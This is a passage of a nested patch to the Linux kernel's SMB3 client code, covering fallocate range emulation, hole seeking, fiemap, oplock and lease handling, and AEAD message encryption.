++			goto out;
++		}
++
++		/*
++		 * Check if falloc starts within first few pages of file
++		 * and ends within a few pages of the end of file to
++		 * ensure that most of file is being forced to be
++		 * fallocated now. If so then setting whole file sparse
++		 * ie potentially making a few extra pages at the beginning
++		 * or end of the file non-sparse via set_sparse is harmless.
++		 */
++		if ((off > 8192) || (off + len + 8192 < i_size_read(inode))) {
++			rc = -EOPNOTSUPP;
++			goto out;
++		}
++	}
++
++	smb2_set_sparse(xid, tcon, cfile, inode, false);
++	rc = 0;
++
++out:
++	if (rc)
++		trace_smb3_falloc_err(xid, cfile->fid.persistent_fid, tcon->tid,
++				tcon->ses->Suid, off, len, rc);
++	else
++		trace_smb3_falloc_done(xid, cfile->fid.persistent_fid, tcon->tid,
++				tcon->ses->Suid, off, len);
++
++	free_xid(xid);
++	return rc;
++}
++
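++/*
++ * FALLOC_FL_COLLAPSE_RANGE emulation: server-side copychunk the tail of
++ * the file (everything past off + len) down to @off, then shrink EOF by
++ * @len.
++ */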
++static long smb3_collapse_range(struct file *file, struct cifs_tcon *tcon,
++			    loff_t off, loff_t len)
++{
++	int rc;
++	unsigned int xid;
++	struct inode *inode = file_inode(file);
++	struct cifsFileInfo *cfile = file->private_data;
++	struct cifsInodeInfo *cifsi = CIFS_I(inode);
++	__le64 eof;
++	loff_t old_eof;
++
++	xid = get_xid();
++
++	inode_lock(inode);
++
++	old_eof = i_size_read(inode);
++	if ((off >= old_eof) ||
++	    off + len >= old_eof) {
++		rc = -EINVAL;
++		goto out;
++	}
++
++	filemap_invalidate_lock(inode->i_mapping);
++	rc = filemap_write_and_wait_range(inode->i_mapping, off, old_eof - 1);
++	if (rc < 0)
++		goto out_2;
++
++	truncate_pagecache_range(inode, off, old_eof);
++
++	rc = smb2_copychunk_range(xid, cfile, cfile, off + len,
++				  old_eof - off - len, off);
++	if (rc < 0)
++		goto out_2;
++
++	eof = cpu_to_le64(old_eof - len);
++	rc = SMB2_set_eof(xid, tcon, cfile->fid.persistent_fid,
++			  cfile->fid.volatile_fid, cfile->pid, &eof);
++	if (rc < 0)
++		goto out_2;
++
++	rc = 0;
++
++	cifsi->server_eof = i_size_read(inode) - len;
++	truncate_setsize(inode, cifsi->server_eof);
++	fscache_resize_cookie(cifs_inode_cookie(inode), cifsi->server_eof);
++out_2:
++	filemap_invalidate_unlock(inode->i_mapping);
++ out:
++	inode_unlock(inode);
++	free_xid(xid);
++	return rc;
++}
++
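++/*
++ * FALLOC_FL_INSERT_RANGE emulation: grow EOF by @len, copychunk the old
++ * tail up by @len to make room, then zero the newly inserted range.
++ */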
++static long smb3_insert_range(struct file *file, struct cifs_tcon *tcon,
++			      loff_t off, loff_t len)
++{
++	int rc;
++	unsigned int xid;
++	struct cifsFileInfo *cfile = file->private_data;
++	struct inode *inode = file_inode(file);
++	__le64 eof;
++	__u64  count, old_eof;
++
++	xid = get_xid();
++
++	inode_lock(inode);
++
++	old_eof = i_size_read(inode);
++	if (off >= old_eof) {
++		rc = -EINVAL;
++		goto out;
++	}
++
++	count = old_eof - off;
++	eof = cpu_to_le64(old_eof + len);
++
++	filemap_invalidate_lock(inode->i_mapping);
++	rc = filemap_write_and_wait_range(inode->i_mapping, off, old_eof + len - 1);
++	if (rc < 0)
++		goto out_2;
++	truncate_pagecache_range(inode, off, old_eof);
++
++	rc = SMB2_set_eof(xid, tcon, cfile->fid.persistent_fid,
++			  cfile->fid.volatile_fid, cfile->pid, &eof);
++	if (rc < 0)
++		goto out_2;
++
++	rc = smb2_copychunk_range(xid, cfile, cfile, off, count, off + len);
++	if (rc < 0)
++		goto out_2;
++
++	rc = smb3_zero_data(file, tcon, off, len, xid);
++	if (rc < 0)
++		goto out_2;
++
++	rc = 0;
++out_2:
++	filemap_invalidate_unlock(inode->i_mapping);
++ out:
++	inode_unlock(inode);
++	free_xid(xid);
++	return rc;
++}
++
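++/*
++ * SEEK_HOLE/SEEK_DATA support: flush dirty pages so the server's view is
++ * current, then locate the offset with FSCTL_QUERY_ALLOCATED_RANGES.
++ * Files without the sparse attribute are treated as fully allocated.
++ */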
++static loff_t smb3_llseek(struct file *file, struct cifs_tcon *tcon, loff_t offset, int whence)
++{
++	struct cifsFileInfo *wrcfile, *cfile = file->private_data;
++	struct cifsInodeInfo *cifsi;
++	struct inode *inode;
++	int rc = 0;
++	struct file_allocated_range_buffer in_data, *out_data = NULL;
++	u32 out_data_len;
++	unsigned int xid;
++
++	if (whence != SEEK_HOLE && whence != SEEK_DATA)
++		return generic_file_llseek(file, offset, whence);
++
++	inode = d_inode(cfile->dentry);
++	cifsi = CIFS_I(inode);
++
++	if (offset < 0 || offset >= i_size_read(inode))
++		return -ENXIO;
++
++	xid = get_xid();
++	/*
++	 * We need to be sure that all dirty pages are written as they
++	 * might fill holes on the server.
++	 * Note that we also MUST flush any written pages since at least
++	 * some servers (Windows2016) will not reflect recent writes in
++	 * QUERY_ALLOCATED_RANGES until SMB2_flush is called.
++	 */
++	wrcfile = find_writable_file(cifsi, FIND_WR_ANY);
++	if (wrcfile) {
++		filemap_write_and_wait(inode->i_mapping);
++		smb2_flush_file(xid, tcon, &wrcfile->fid);
++		cifsFileInfo_put(wrcfile);
++	}
++
++	if (!(cifsi->cifsAttrs & FILE_ATTRIBUTE_SPARSE_FILE)) {
++		if (whence == SEEK_HOLE)
++			offset = i_size_read(inode);
++		goto lseek_exit;
++	}
++
++	in_data.file_offset = cpu_to_le64(offset);
++	in_data.length = cpu_to_le64(i_size_read(inode));
++
++	rc = SMB2_ioctl(xid, tcon, cfile->fid.persistent_fid,
++			cfile->fid.volatile_fid,
++			FSCTL_QUERY_ALLOCATED_RANGES,
++			(char *)&in_data, sizeof(in_data),
++			sizeof(struct file_allocated_range_buffer),
++			(char **)&out_data, &out_data_len);
++	if (rc == -E2BIG)
++		rc = 0;
++	if (rc)
++		goto lseek_exit;
++
++	if (whence == SEEK_HOLE && out_data_len == 0)
++		goto lseek_exit;
++
++	if (whence == SEEK_DATA && out_data_len == 0) {
++		rc = -ENXIO;
++		goto lseek_exit;
++	}
++
++	if (out_data_len < sizeof(struct file_allocated_range_buffer)) {
++		rc = -EINVAL;
++		goto lseek_exit;
++	}
++	if (whence == SEEK_DATA) {
++		offset = le64_to_cpu(out_data->file_offset);
++		goto lseek_exit;
++	}
++	if (offset < le64_to_cpu(out_data->file_offset))
++		goto lseek_exit;
++
++	offset = le64_to_cpu(out_data->file_offset) + le64_to_cpu(out_data->length);
++
++ lseek_exit:
++	free_xid(xid);
++	kfree(out_data);
++	if (!rc)
++		return vfs_setpos(file, offset, inode->i_sb->s_maxbytes);
++	else
++		return rc;
++}
++
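++/*
++ * fiemap via FSCTL_QUERY_ALLOCATED_RANGES, fetching up to 1024 range
++ * buffers per call; -E2BIG means more extents remain, so the query is
++ * repeated starting at the end of the last returned range.
++ */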
++static int smb3_fiemap(struct cifs_tcon *tcon,
++		       struct cifsFileInfo *cfile,
++		       struct fiemap_extent_info *fei, u64 start, u64 len)
++{
++	unsigned int xid;
++	struct file_allocated_range_buffer in_data, *out_data;
++	u32 out_data_len;
++	int i, num, rc, flags, last_blob;
++	u64 next;
++
++	rc = fiemap_prep(d_inode(cfile->dentry), fei, start, &len, 0);
++	if (rc)
++		return rc;
++
++	xid = get_xid();
++ again:
++	in_data.file_offset = cpu_to_le64(start);
++	in_data.length = cpu_to_le64(len);
++
++	rc = SMB2_ioctl(xid, tcon, cfile->fid.persistent_fid,
++			cfile->fid.volatile_fid,
++			FSCTL_QUERY_ALLOCATED_RANGES,
++			(char *)&in_data, sizeof(in_data),
++			1024 * sizeof(struct file_allocated_range_buffer),
++			(char **)&out_data, &out_data_len);
++	if (rc == -E2BIG) {
++		last_blob = 0;
++		rc = 0;
++	} else
++		last_blob = 1;
++	if (rc)
++		goto out;
++
++	if (out_data_len && out_data_len < sizeof(struct file_allocated_range_buffer)) {
++		rc = -EINVAL;
++		goto out;
++	}
++	if (out_data_len % sizeof(struct file_allocated_range_buffer)) {
++		rc = -EINVAL;
++		goto out;
++	}
++
++	num = out_data_len / sizeof(struct file_allocated_range_buffer);
++	for (i = 0; i < num; i++) {
++		flags = 0;
++		if (i == num - 1 && last_blob)
++			flags |= FIEMAP_EXTENT_LAST;
++
++		rc = fiemap_fill_next_extent(fei,
++				le64_to_cpu(out_data[i].file_offset),
++				le64_to_cpu(out_data[i].file_offset),
++				le64_to_cpu(out_data[i].length),
++				flags);
++		if (rc < 0)
++			goto out;
++		if (rc == 1) {
++			rc = 0;
++			goto out;
++		}
++	}
++
++	if (!last_blob) {
++		next = le64_to_cpu(out_data[num - 1].file_offset) +
++		  le64_to_cpu(out_data[num - 1].length);
++		len = len - (next - start);
++		start = next;
++		goto again;
++	}
++
++ out:
++	free_xid(xid);
++	kfree(out_data);
++	return rc;
++}
++
++static long smb3_fallocate(struct file *file, struct cifs_tcon *tcon, int mode,
++			   loff_t off, loff_t len)
++{
++	/* KEEP_SIZE already checked for by do_fallocate */
++	if (mode & FALLOC_FL_PUNCH_HOLE)
++		return smb3_punch_hole(file, tcon, off, len);
++	else if (mode & FALLOC_FL_ZERO_RANGE) {
++		if (mode & FALLOC_FL_KEEP_SIZE)
++			return smb3_zero_range(file, tcon, off, len, true);
++		return smb3_zero_range(file, tcon, off, len, false);
++	} else if (mode == FALLOC_FL_KEEP_SIZE)
++		return smb3_simple_falloc(file, tcon, off, len, true);
++	else if (mode == FALLOC_FL_COLLAPSE_RANGE)
++		return smb3_collapse_range(file, tcon, off, len);
++	else if (mode == FALLOC_FL_INSERT_RANGE)
++		return smb3_insert_range(file, tcon, off, len);
++	else if (mode == 0)
++		return smb3_simple_falloc(file, tcon, off, len, false);
++
++	return -EOPNOTSUPP;
++}
++
++static void
++smb2_downgrade_oplock(struct TCP_Server_Info *server,
++		      struct cifsInodeInfo *cinode, __u32 oplock,
++		      unsigned int epoch, bool *purge_cache)
++{
++	server->ops->set_oplock_level(cinode, oplock, 0, NULL);
++}
++
++static void
++smb21_set_oplock_level(struct cifsInodeInfo *cinode, __u32 oplock,
++		       unsigned int epoch, bool *purge_cache);
++
++static void
++smb3_downgrade_oplock(struct TCP_Server_Info *server,
++		       struct cifsInodeInfo *cinode, __u32 oplock,
++		       unsigned int epoch, bool *purge_cache)
++{
++	unsigned int old_state = cinode->oplock;
++	unsigned int old_epoch = cinode->epoch;
++	unsigned int new_state;
++
++	if (epoch > old_epoch) {
++		smb21_set_oplock_level(cinode, oplock, 0, NULL);
++		cinode->epoch = epoch;
++	}
++
++	new_state = cinode->oplock;
++	*purge_cache = false;
++
++	if ((old_state & CIFS_CACHE_READ_FLG) != 0 &&
++	    (new_state & CIFS_CACHE_READ_FLG) == 0)
++		*purge_cache = true;
++	else if (old_state == new_state && (epoch - old_epoch > 1))
++		*purge_cache = true;
++}
++
++static void
++smb2_set_oplock_level(struct cifsInodeInfo *cinode, __u32 oplock,
++		      unsigned int epoch, bool *purge_cache)
++{
++	oplock &= 0xFF;
++	cinode->lease_granted = false;
++	if (oplock == SMB2_OPLOCK_LEVEL_NOCHANGE)
++		return;
++	if (oplock == SMB2_OPLOCK_LEVEL_BATCH) {
++		cinode->oplock = CIFS_CACHE_RHW_FLG;
++		cifs_dbg(FYI, "Batch Oplock granted on inode %p\n",
++			 &cinode->netfs.inode);
++	} else if (oplock == SMB2_OPLOCK_LEVEL_EXCLUSIVE) {
++		cinode->oplock = CIFS_CACHE_RW_FLG;
++		cifs_dbg(FYI, "Exclusive Oplock granted on inode %p\n",
++			 &cinode->netfs.inode);
++	} else if (oplock == SMB2_OPLOCK_LEVEL_II) {
++		cinode->oplock = CIFS_CACHE_READ_FLG;
++		cifs_dbg(FYI, "Level II Oplock granted on inode %p\n",
++			 &cinode->netfs.inode);
++	} else
++		cinode->oplock = 0;
++}
++
++static void
++smb21_set_oplock_level(struct cifsInodeInfo *cinode, __u32 oplock,
++		       unsigned int epoch, bool *purge_cache)
++{
++	char message[5] = {0};
++	unsigned int new_oplock = 0;
++
++	oplock &= 0xFF;
++	cinode->lease_granted = true;
++	if (oplock == SMB2_OPLOCK_LEVEL_NOCHANGE)
++		return;
++
++	/* Check if the server granted an oplock rather than a lease */
++	if (oplock & SMB2_OPLOCK_LEVEL_EXCLUSIVE)
++		return smb2_set_oplock_level(cinode, oplock, epoch,
++					     purge_cache);
++
++	if (oplock & SMB2_LEASE_READ_CACHING_HE) {
++		new_oplock |= CIFS_CACHE_READ_FLG;
++		strcat(message, "R");
++	}
++	if (oplock & SMB2_LEASE_HANDLE_CACHING_HE) {
++		new_oplock |= CIFS_CACHE_HANDLE_FLG;
++		strcat(message, "H");
++	}
++	if (oplock & SMB2_LEASE_WRITE_CACHING_HE) {
++		new_oplock |= CIFS_CACHE_WRITE_FLG;
++		strcat(message, "W");
++	}
++	if (!new_oplock)
++		strncpy(message, "None", sizeof(message));
++
++	cinode->oplock = new_oplock;
++	cifs_dbg(FYI, "%s Lease granted on inode %p\n", message,
++		 &cinode->netfs.inode);
++}
++
++static void
++smb3_set_oplock_level(struct cifsInodeInfo *cinode, __u32 oplock,
++		      unsigned int epoch, bool *purge_cache)
++{
++	unsigned int old_oplock = cinode->oplock;
++
++	smb21_set_oplock_level(cinode, oplock, epoch, purge_cache);
++
++	if (purge_cache) {
++		*purge_cache = false;
++		if (old_oplock == CIFS_CACHE_READ_FLG) {
++			if (cinode->oplock == CIFS_CACHE_READ_FLG &&
++			    (epoch - cinode->epoch > 0))
++				*purge_cache = true;
++			else if (cinode->oplock == CIFS_CACHE_RH_FLG &&
++				 (epoch - cinode->epoch > 1))
++				*purge_cache = true;
++			else if (cinode->oplock == CIFS_CACHE_RHW_FLG &&
++				 (epoch - cinode->epoch > 1))
++				*purge_cache = true;
++			else if (cinode->oplock == 0 &&
++				 (epoch - cinode->epoch > 0))
++				*purge_cache = true;
++		} else if (old_oplock == CIFS_CACHE_RH_FLG) {
++			if (cinode->oplock == CIFS_CACHE_RH_FLG &&
++			    (epoch - cinode->epoch > 0))
++				*purge_cache = true;
++			else if (cinode->oplock == CIFS_CACHE_RHW_FLG &&
++				 (epoch - cinode->epoch > 1))
++				*purge_cache = true;
++		}
++		cinode->epoch = epoch;
++	}
++}
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++static bool
++smb2_is_read_op(__u32 oplock)
++{
++	return oplock == SMB2_OPLOCK_LEVEL_II;
++}
++#endif /* CIFS_ALLOW_INSECURE_LEGACY */
++
++static bool
++smb21_is_read_op(__u32 oplock)
++{
++	return (oplock & SMB2_LEASE_READ_CACHING_HE) &&
++	       !(oplock & SMB2_LEASE_WRITE_CACHING_HE);
++}
++
++static __le32
++map_oplock_to_lease(u8 oplock)
++{
++	if (oplock == SMB2_OPLOCK_LEVEL_EXCLUSIVE)
++		return SMB2_LEASE_WRITE_CACHING_LE | SMB2_LEASE_READ_CACHING_LE;
++	else if (oplock == SMB2_OPLOCK_LEVEL_II)
++		return SMB2_LEASE_READ_CACHING_LE;
++	else if (oplock == SMB2_OPLOCK_LEVEL_BATCH)
++		return SMB2_LEASE_HANDLE_CACHING_LE | SMB2_LEASE_READ_CACHING_LE |
++		       SMB2_LEASE_WRITE_CACHING_LE;
++	return 0;
++}
++
++static char *
++smb2_create_lease_buf(u8 *lease_key, u8 oplock)
++{
++	struct create_lease *buf;
++
++	buf = kzalloc(sizeof(struct create_lease), GFP_KERNEL);
++	if (!buf)
++		return NULL;
++
++	memcpy(&buf->lcontext.LeaseKey, lease_key, SMB2_LEASE_KEY_SIZE);
++	buf->lcontext.LeaseState = map_oplock_to_lease(oplock);
++
++	buf->ccontext.DataOffset = cpu_to_le16(offsetof
++					(struct create_lease, lcontext));
++	buf->ccontext.DataLength = cpu_to_le32(sizeof(struct lease_context));
++	buf->ccontext.NameOffset = cpu_to_le16(offsetof
++				(struct create_lease, Name));
++	buf->ccontext.NameLength = cpu_to_le16(4);
++	/* SMB2_CREATE_REQUEST_LEASE is "RqLs" */
++	buf->Name[0] = 'R';
++	buf->Name[1] = 'q';
++	buf->Name[2] = 'L';
++	buf->Name[3] = 's';
++	return (char *)buf;
++}
++
++static char *
++smb3_create_lease_buf(u8 *lease_key, u8 oplock)
++{
++	struct create_lease_v2 *buf;
++
++	buf = kzalloc(sizeof(struct create_lease_v2), GFP_KERNEL);
++	if (!buf)
++		return NULL;
++
++	memcpy(&buf->lcontext.LeaseKey, lease_key, SMB2_LEASE_KEY_SIZE);
++	buf->lcontext.LeaseState = map_oplock_to_lease(oplock);
++
++	buf->ccontext.DataOffset = cpu_to_le16(offsetof
++					(struct create_lease_v2, lcontext));
++	buf->ccontext.DataLength = cpu_to_le32(sizeof(struct lease_context_v2));
++	buf->ccontext.NameOffset = cpu_to_le16(offsetof
++				(struct create_lease_v2, Name));
++	buf->ccontext.NameLength = cpu_to_le16(4);
++	/* SMB2_CREATE_REQUEST_LEASE is "RqLs" */
++	buf->Name[0] = 'R';
++	buf->Name[1] = 'q';
++	buf->Name[2] = 'L';
++	buf->Name[3] = 's';
++	return (char *)buf;
++}
++
++static __u8
++smb2_parse_lease_buf(void *buf, unsigned int *epoch, char *lease_key)
++{
++	struct create_lease *lc = (struct create_lease *)buf;
++
++	*epoch = 0; /* not used */
++	if (lc->lcontext.LeaseFlags & SMB2_LEASE_FLAG_BREAK_IN_PROGRESS_LE)
++		return SMB2_OPLOCK_LEVEL_NOCHANGE;
++	return le32_to_cpu(lc->lcontext.LeaseState);
++}
++
++static __u8
++smb3_parse_lease_buf(void *buf, unsigned int *epoch, char *lease_key)
++{
++	struct create_lease_v2 *lc = (struct create_lease_v2 *)buf;
++
++	*epoch = le16_to_cpu(lc->lcontext.Epoch);
++	if (lc->lcontext.LeaseFlags & SMB2_LEASE_FLAG_BREAK_IN_PROGRESS_LE)
++		return SMB2_OPLOCK_LEVEL_NOCHANGE;
++	if (lease_key)
++		memcpy(lease_key, &lc->lcontext.LeaseKey, SMB2_LEASE_KEY_SIZE);
++	return le32_to_cpu(lc->lcontext.LeaseState);
++}
++
++static unsigned int
++smb2_wp_retry_size(struct inode *inode)
++{
++	return min_t(unsigned int, CIFS_SB(inode->i_sb)->ctx->wsize,
++		     SMB2_MAX_BUFFER_SIZE);
++}
++
++static bool
++smb2_dir_needs_close(struct cifsFileInfo *cfile)
++{
++	return !cfile->invalidHandle;
++}
++
++static void
++fill_transform_hdr(struct smb2_transform_hdr *tr_hdr, unsigned int orig_len,
++		   struct smb_rqst *old_rq, __le16 cipher_type)
++{
++	struct smb2_hdr *shdr =
++			(struct smb2_hdr *)old_rq->rq_iov[0].iov_base;
++
++	memset(tr_hdr, 0, sizeof(struct smb2_transform_hdr));
++	tr_hdr->ProtocolId = SMB2_TRANSFORM_PROTO_NUM;
++	tr_hdr->OriginalMessageSize = cpu_to_le32(orig_len);
++	tr_hdr->Flags = cpu_to_le16(0x01);
++	if ((cipher_type == SMB2_ENCRYPTION_AES128_GCM) ||
++	    (cipher_type == SMB2_ENCRYPTION_AES256_GCM))
++		get_random_bytes(&tr_hdr->Nonce, SMB3_AES_GCM_NONCE);
++	else
++		get_random_bytes(&tr_hdr->Nonce, SMB3_AES_CCM_NONCE);
++	memcpy(&tr_hdr->SessionId, &shdr->SessionId, 8);
++}
++
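++/*
++ * Allocate a single buffer holding the AEAD IV, the aead_request and the
++ * scatterlist array, with each part aligned as the crypto API requires.
++ */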
++static void *smb2_aead_req_alloc(struct crypto_aead *tfm, const struct smb_rqst *rqst,
++				 int num_rqst, const u8 *sig, u8 **iv,
++				 struct aead_request **req, struct scatterlist **sgl,
++				 unsigned int *num_sgs)
++{
++	unsigned int req_size = sizeof(**req) + crypto_aead_reqsize(tfm);
++	unsigned int iv_size = crypto_aead_ivsize(tfm);
++	unsigned int len;
++	u8 *p;
++
++	*num_sgs = cifs_get_num_sgs(rqst, num_rqst, sig);
++
++	len = iv_size;
++	len += crypto_aead_alignmask(tfm) & ~(crypto_tfm_ctx_alignment() - 1);
++	len = ALIGN(len, crypto_tfm_ctx_alignment());
++	len += req_size;
++	len = ALIGN(len, __alignof__(struct scatterlist));
++	len += *num_sgs * sizeof(**sgl);
++
++	p = kmalloc(len, GFP_ATOMIC);
++	if (!p)
++		return NULL;
++
++	*iv = (u8 *)PTR_ALIGN(p, crypto_aead_alignmask(tfm) + 1);
++	*req = (struct aead_request *)PTR_ALIGN(*iv + iv_size,
++						crypto_tfm_ctx_alignment());
++	*sgl = (struct scatterlist *)PTR_ALIGN((u8 *)*req + req_size,
++					       __alignof__(struct scatterlist));
++	return p;
++}
++
++static void *smb2_get_aead_req(struct crypto_aead *tfm, const struct smb_rqst *rqst,
++			       int num_rqst, const u8 *sig, u8 **iv,
++			       struct aead_request **req, struct scatterlist **sgl)
++{
++	unsigned int off, len, skip;
++	struct scatterlist *sg;
++	unsigned int num_sgs;
++	unsigned long addr;
++	int i, j;
++	void *p;
++
++	p = smb2_aead_req_alloc(tfm, rqst, num_rqst, sig, iv, req, sgl, &num_sgs);
++	if (!p)
++		return NULL;
++
++	sg_init_table(*sgl, num_sgs);
++	sg = *sgl;
++
++	/* Assumes the first rqst has a transform header as the first iov.
++	 * I.e.
++	 * rqst[0].rq_iov[0]  is transform header
++	 * rqst[0].rq_iov[1+] data to be encrypted/decrypted
++	 * rqst[1+].rq_iov[0+] data to be encrypted/decrypted
++	 */
++	for (i = 0; i < num_rqst; i++) {
++		/*
++		 * The first rqst has a transform header where the
++		 * first 20 bytes are not part of the encrypted blob.
++		 */
++		for (j = 0; j < rqst[i].rq_nvec; j++) {
++			struct kvec *iov = &rqst[i].rq_iov[j];
++
++			skip = (i == 0) && (j == 0) ? 20 : 0;
++			addr = (unsigned long)iov->iov_base + skip;
++			len = iov->iov_len - skip;
++			sg = cifs_sg_set_buf(sg, (void *)addr, len);
++		}
++		for (j = 0; j < rqst[i].rq_npages; j++) {
++			rqst_page_get_length(&rqst[i], j, &len, &off);
++			sg_set_page(sg++, rqst[i].rq_pages[j], len, off);
++		}
++	}
++	cifs_sg_set_buf(sg, sig, SMB2_SIGNATURE_SIZE);
++
++	return p;
++}
++
++static int
++smb2_get_enc_key(struct TCP_Server_Info *server, __u64 ses_id, int enc, u8 *key)
++{
++	struct TCP_Server_Info *pserver;
++	struct cifs_ses *ses;
++	u8 *ses_enc_key;
++
++	/* If server is a channel, select the primary channel */
++	pserver = CIFS_SERVER_IS_CHAN(server) ? server->primary_server : server;
++
++	spin_lock(&cifs_tcp_ses_lock);
++	list_for_each_entry(ses, &pserver->smb_ses_list, smb_ses_list) {
++		if (ses->Suid == ses_id) {
++			spin_lock(&ses->ses_lock);
++			ses_enc_key = enc ? ses->smb3encryptionkey :
++				ses->smb3decryptionkey;
++			memcpy(key, ses_enc_key, SMB3_ENC_DEC_KEY_SIZE);
++			spin_unlock(&ses->ses_lock);
++			spin_unlock(&cifs_tcp_ses_lock);
++			return 0;
++		}
++	}
++	spin_unlock(&cifs_tcp_ses_lock);
++
++	return -EAGAIN;
++}
++
++/*
++ * Encrypt or decrypt @rqst message. @rqst[0] has the following format:
++ * iov[0]   - transform header (associate data),
++ * iov[1-N] - SMB2 header and pages - data to encrypt.
++ * On success return encrypted data in iov[1-N] and pages, leave iov[0]
++ * untouched.
++ */
++static int
++crypt_message(struct TCP_Server_Info *server, int num_rqst,
++	      struct smb_rqst *rqst, int enc)
++{
++	struct smb2_transform_hdr *tr_hdr =
++		(struct smb2_transform_hdr *)rqst[0].rq_iov[0].iov_base;
++	unsigned int assoc_data_len = sizeof(struct smb2_transform_hdr) - 20;
++	int rc = 0;
++	struct scatterlist *sg;
++	u8 sign[SMB2_SIGNATURE_SIZE] = {};
++	u8 key[SMB3_ENC_DEC_KEY_SIZE];
++	struct aead_request *req;
++	u8 *iv;
++	DECLARE_CRYPTO_WAIT(wait);
++	struct crypto_aead *tfm;
++	unsigned int crypt_len = le32_to_cpu(tr_hdr->OriginalMessageSize);
++	void *creq;
++
++	rc = smb2_get_enc_key(server, le64_to_cpu(tr_hdr->SessionId), enc, key);
++	if (rc) {
++		cifs_server_dbg(VFS, "%s: Could not get %scryption key\n", __func__,
++			 enc ? "en" : "de");
++		return rc;
++	}
++
++	rc = smb3_crypto_aead_allocate(server);
++	if (rc) {
++		cifs_server_dbg(VFS, "%s: crypto alloc failed\n", __func__);
++		return rc;
++	}
++
++	tfm = enc ? server->secmech.enc : server->secmech.dec;
++
++	if ((server->cipher_type == SMB2_ENCRYPTION_AES256_CCM) ||
++		(server->cipher_type == SMB2_ENCRYPTION_AES256_GCM))
++		rc = crypto_aead_setkey(tfm, key, SMB3_GCM256_CRYPTKEY_SIZE);
++	else
++		rc = crypto_aead_setkey(tfm, key, SMB3_GCM128_CRYPTKEY_SIZE);
++
++	if (rc) {
++		cifs_server_dbg(VFS, "%s: Failed to set aead key %d\n", __func__, rc);
++		return rc;
++	}
++
++	rc = crypto_aead_setauthsize(tfm, SMB2_SIGNATURE_SIZE);
++	if (rc) {
++		cifs_server_dbg(VFS, "%s: Failed to set authsize %d\n", __func__, rc);
++		return rc;
++	}
++
++	creq = smb2_get_aead_req(tfm, rqst, num_rqst, sign, &iv, &req, &sg);
++	if (unlikely(!creq))
++		return -ENOMEM;
++
++	if (!enc) {
++		memcpy(sign, &tr_hdr->Signature, SMB2_SIGNATURE_SIZE);
++		crypt_len += SMB2_SIGNATURE_SIZE;
++	}
++
++	if ((server->cipher_type == SMB2_ENCRYPTION_AES128_GCM) ||
++	    (server->cipher_type == SMB2_ENCRYPTION_AES256_GCM))
++		memcpy(iv, (char *)tr_hdr->Nonce, SMB3_AES_GCM_NONCE);
++	else {
++		iv[0] = 3;
++		memcpy(iv + 1, (char *)tr_hdr->Nonce, SMB3_AES_CCM_NONCE);
++	}
++
++	aead_request_set_tfm(req, tfm);
++	aead_request_set_crypt(req, sg, sg, crypt_len, iv);
++	aead_request_set_ad(req, assoc_data_len);
++
++	aead_request_set_callback(req, CRYPTO_TFM_REQ_MAY_BACKLOG,
++				  crypto_req_done, &wait);
++
++	rc = crypto_wait_req(enc ? crypto_aead_encrypt(req)
++				: crypto_aead_decrypt(req), &wait);
++
++	if (!rc && enc)
++		memcpy(&tr_hdr->Signature, sign, SMB2_SIGNATURE_SIZE);
++
++	kfree_sensitive(creq);
++	return rc;
++}
++
++void
++smb3_free_compound_rqst(int num_rqst, struct smb_rqst *rqst)
++{
++	int i, j;
++
++	for (i = 0; i < num_rqst; i++) {
++		if (rqst[i].rq_pages) {
++			for (j = rqst[i].rq_npages - 1; j >= 0; j--)
++				put_page(rqst[i].rq_pages[j]);
++			kfree(rqst[i].rq_pages);
++		}
++	}
++}
++
++/*
++ * This function will initialize new_rq and encrypt the content.
++ * The first entry, new_rq[0], only contains a single iov which contains
++ * a smb2_transform_hdr and is pre-allocated by the caller.
++ * This function then populates new_rq[1+] with the content from old_rq[0+].
++ *
++ * The end result is an array of smb_rqst structures where the first structure
++ * only contains a single iov for the transform header which we then can pass
++ * to crypt_message().
++ *
++ * new_rq[0].rq_iov[0] :  smb2_transform_hdr pre-allocated by the caller
++ * new_rq[1+].rq_iov[*] == old_rq[0+].rq_iov[*] : SMB2/3 requests
++ */
++static int
++smb3_init_transform_rq(struct TCP_Server_Info *server, int num_rqst,
++		       struct smb_rqst *new_rq, struct smb_rqst *old_rq)
++{
++	struct page **pages;
++	struct smb2_transform_hdr *tr_hdr = new_rq[0].rq_iov[0].iov_base;
++	unsigned int npages;
++	unsigned int orig_len = 0;
++	int i, j;
++	int rc = -ENOMEM;
++
++	for (i = 1; i < num_rqst; i++) {
++		npages = old_rq[i - 1].rq_npages;
++		pages = kmalloc_array(npages, sizeof(struct page *),
++				      GFP_KERNEL);
++		if (!pages)
++			goto err_free;
++
++		new_rq[i].rq_pages = pages;
++		new_rq[i].rq_npages = npages;
++		new_rq[i].rq_offset = old_rq[i - 1].rq_offset;
++		new_rq[i].rq_pagesz = old_rq[i - 1].rq_pagesz;
++		new_rq[i].rq_tailsz = old_rq[i - 1].rq_tailsz;
++		new_rq[i].rq_iov = old_rq[i - 1].rq_iov;
++		new_rq[i].rq_nvec = old_rq[i - 1].rq_nvec;
++
++		orig_len += smb_rqst_len(server, &old_rq[i - 1]);
++
++		for (j = 0; j < npages; j++) {
++			pages[j] = alloc_page(GFP_KERNEL|__GFP_HIGHMEM);
++			if (!pages[j])
++				goto err_free;
++		}
++
++		/* copy the page data from the old request */
++		for (j = 0; j < npages; j++) {
++			char *dst, *src;
++			unsigned int offset, len;
++
++			rqst_page_get_length(&new_rq[i], j, &len, &offset);
++
++			dst = (char *) kmap(new_rq[i].rq_pages[j]) + offset;
++			src = (char *) kmap(old_rq[i - 1].rq_pages[j]) + offset;
++
++			memcpy(dst, src, len);
++			kunmap(new_rq[i].rq_pages[j]);
++			kunmap(old_rq[i - 1].rq_pages[j]);
++		}
++	}
++
++	/* fill the 1st iov with a transform header */
++	fill_transform_hdr(tr_hdr, orig_len, old_rq, server->cipher_type);
++
++	rc = crypt_message(server, num_rqst, new_rq, 1);
++	cifs_dbg(FYI, "Encrypt message returned %d\n", rc);
++	if (rc)
++		goto err_free;
++
++	return rc;
++
++err_free:
++	smb3_free_compound_rqst(num_rqst - 1, &new_rq[1]);
++	return rc;
++}
++
++static int
++smb3_is_transform_hdr(void *buf)
++{
++	struct smb2_transform_hdr *trhdr = buf;
++
++	return trhdr->ProtocolId == SMB2_TRANSFORM_PROTO_NUM;
++}
++
++static int
++decrypt_raw_data(struct TCP_Server_Info *server, char *buf,
++		 unsigned int buf_data_size, struct page **pages,
++		 unsigned int npages, unsigned int page_data_size,
++		 bool is_offloaded)
++{
++	struct kvec iov[2];
++	struct smb_rqst rqst = {NULL};
++	int rc;
++
++	iov[0].iov_base = buf;
